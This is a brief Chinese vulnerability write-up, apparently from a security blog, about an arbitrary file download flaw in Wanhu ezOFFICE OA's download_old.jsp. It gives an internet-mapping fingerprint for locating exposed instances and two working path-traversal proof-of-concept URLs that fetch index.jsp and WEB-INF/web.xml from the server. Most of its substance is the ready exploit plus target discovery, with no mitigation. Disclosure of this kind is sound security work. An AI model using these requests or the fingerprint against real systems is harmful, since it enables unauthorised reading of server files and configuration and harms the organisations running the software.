漏洞描述
万户OA download_old.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。
漏洞影响
万户OA
网络测绘
app=”万户网络-ezOFFICE”
漏洞复现
产品页面
验证POC
/defaultroot/download_old.jsp?path=..&name=x&FileName=index.jsp
/defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml
© 版权声明
THE END
暂无评论内容